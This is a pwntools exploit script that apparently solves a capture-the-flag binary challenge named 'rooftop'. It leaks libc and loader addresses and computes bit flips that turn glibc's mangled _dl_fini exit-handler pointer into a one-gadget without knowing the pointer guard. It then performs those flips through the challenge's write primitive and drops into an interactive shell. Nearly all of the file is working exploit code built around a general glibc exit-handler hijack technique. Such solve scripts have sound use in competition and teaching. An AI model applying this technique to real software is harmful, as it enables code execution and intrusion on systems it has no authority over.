#!/usr/bin/env python
from pwn import *

# Remote challenge endpoint (start() lets HOST/PORT env vars override these).
HOST, PORT = "challs.polygl0ts.ch", 6008
context.aslr = False

# Target binary plus the shipped loader/libc, used for symbol offsets.
exe = context.binary = ELF("./rooftop", checksec=False)
libc = ELF("./libc.so.6", checksec=False)
ld = ELF("./ld-linux-x86-64.so.2", checksec=False)

# Terminal used by pwntools when it spawns gdb windows.
context.terminal = [
    "kitten", "@", "launch",
    "--location=before", "--cwd=current", "--bias=65",
]
context.log_level = "debug"
context.encoding = "ascii"


def start(argv=None, *a, **kw):
    """Launch the target and return a pwntools tube.

    Selected by pwntools command-line ``args``:
      ASLR       -- enable ASLR for local runs (sets ``context.aslr``).
      GDB / DBG  -- run ``exe`` under gdb using the module-level ``gdbinit``.
      REMOTE     -- connect to HOST:PORT (env vars HOST/PORT override).
      DOCKER     -- connect to localhost:PORT.
    Otherwise the binary is started as a local process.

    ``argv`` holds extra command-line arguments for the local/gdb binary
    (previously accepted but ignored). ``*a``/``**kw`` are forwarded to
    ``gdb.debug``/``process``; gdb runs default to an empty environment
    unless the caller passes ``env``.
    """
    argv = [] if argv is None else list(argv)
    if args.ASLR:
        context.aslr = True

    cmdline = [exe.path, *argv]
    if args.GDB or args.DBG:
        # Keep the original empty-env default, but let callers override it
        # instead of hitting a duplicate-keyword TypeError.
        kw.setdefault("env", {})
        return gdb.debug(cmdline, gdbinit, *a, **kw)
    if args.REMOTE:
        return remote(os.environ.get("HOST", HOST), int(os.environ.get("PORT", PORT)))
    if args.DOCKER:
        return remote("localhost", PORT)
    return process(cmdline, *a, **kw)


# template end

def shoot(addr: int, idx: int):
    """Answer the X and Y coordinate prompts with ``addr`` and ``idx``.

    Each value is sent as ``hex()`` text (e.g. ``0x1f``) with no trailing
    newline, right after its prompt is received. In this script the caller
    passes a byte address as ``addr`` and a bit index as ``idx``.
    """
    for prompt, value in ((b"X coordinate: ", addr), (b"Y coordinate: ", idx)):
        p.sendafter(prompt, hex(value).encode("ascii"))

def advance():
    """Wait until the next ``>`` prompt arrives, then send an empty line."""
    p.recvuntil(b">")
    p.sendline(b"")


# gdb commands handed to gdb.debug() by start() when GDB/DBG is passed.
# Kept as a plain literal: the former `.format(**locals())` substituted
# nothing and would break on gdb syntax that uses braces (e.g. `set {long}…`).
gdbinit = """
tbreak main
set follow-fork-mode child
continue
"""

def _mangled_bit_flips(current_ptr: int, wanted_ptr: int, rot: int = 0x11) -> list[tuple[int, int]]:
    """Return the (byte offset, bit) flips turning one mangled pointer into another.

    Pointer-guard mangling as used here:
        encrypt(fptr, guard) = rol(fptr ^ guard, 0x11, 64)
        decrypt(fptr, guard) = ror(fptr, 0x11, 64) ^ guard
    XOR commutes with rotation, so flipping bit ``i`` of the plain pointer
    flips bit ``(i + rot) % 64`` of the stored value. The guard never has to
    be known.

    Byte offsets assume a little-endian 64-bit slot (x86-64 here). Pairs are
    ordered by the plain-pointer bit index ``i`` from 0 to 63.
    """
    diff = current_ptr ^ wanted_ptr
    flips: list[tuple[int, int]] = []
    for i in range(64):
        if (diff >> i) & 1:
            pos = (i + rot) % 64
            flips.append((pos // 8, pos % 8))
    return flips


ind = -1

# Retry fresh instances until the one-gadget differs from _dl_fini in at most
# 9 bits. 9 matches the shot budget padded to in the final phase.
while True:
    context.log_level = 'critical'
    ind += 1
    print(f"run: {ind}")

    os.system("make")

    # Reset rebasing from the previous attempt so the sym lookups below yield
    # offsets again before the new leaks are applied.
    exe.address = libc.address = ld.address = 0
    exe = context.binary = ELF("./rooftop", checksec=False)

    p = start()

    try:
        # These prompts are inside the try so that a target dying this early
        # is retried (or Ctrl-C handled) like any later failure.
        for _ in range(7):
            advance()

        p.sendafter(b'X coordinate: ', b"3E335")
        p.sendafter(b'Y coordinate: ', b"0")
        for _ in range(5):
            advance()

        # now in the stairwell
        advance()
        exe = context.binary = ELF("./stairwell", checksec=False)

        advance()
        advance()

        # Two raw pointer leaks, one per line: libc's read and an ld address
        # 0x36000 past ld's base. unpack() raises ValueError when a line is not
        # exactly one word long (presumably a leak containing a '\n' byte);
        # that case is retried below.
        libc.address = unpack(p.recvline(drop=True)) - libc.sym['read']
        ld.address = unpack(p.recvline(drop=True)) - 0x36000

        for _ in range(3):
            advance()

        print("LIBC: ", hex(libc.address))
        print("LD: ", hex(ld.address))

        onegadget = libc.address + 0xd8131
        dl_fini = ld.sym['_dl_fini']
        print("one gadget: ", hex(onegadget))
        print("_dl_fini: ", hex(dl_fini))

        needed_flips = _mangled_bit_flips(dl_fini, onegadget)
        print(f"[+] need {len(needed_flips)} flips!")

        if len(needed_flips) > 9:
            print("too many..")
            p.close()
            continue

        print("========= SUCCESS ============")
        context.log_level = 'debug'
        # gdb.attach(p)  # uncomment to inspect the process before flipping
        break

    except EOFError:
        p.close()
    except ValueError as err:
        print("value error: ", err)
        p.close()
    except KeyboardInterrupt:
        print("ctrl-c pressed")
        p.close()
        exit()

# Rewrite the mangled pointer that currently decodes to _dl_fini, one bit per
# shot. NOTE(review): +0x18 into libc's `initial` is presumably
# fns[0].func.cxa.fn of glibc's struct exit_function_list — confirm for this
# libc build.
handler_slot = libc.sym['initial'] + 0x18
for byte_off, bit_no in needed_flips:
    shoot(handler_slot + byte_off, bit_no)

# Spend the remaining shots (9 in total) on a throwaway target.
# NOTE(review): if shoot() toggles the bit, an odd number of padding shots
# leaves bit 0 of the first byte of libc's `stderr` flipped — confirm harmless.
for _ in range(9 - len(needed_flips)):
    shoot(libc.sym['stderr'], 0)

# p.sendline(b'cat flag.txt')
p.interactive()
p.close()
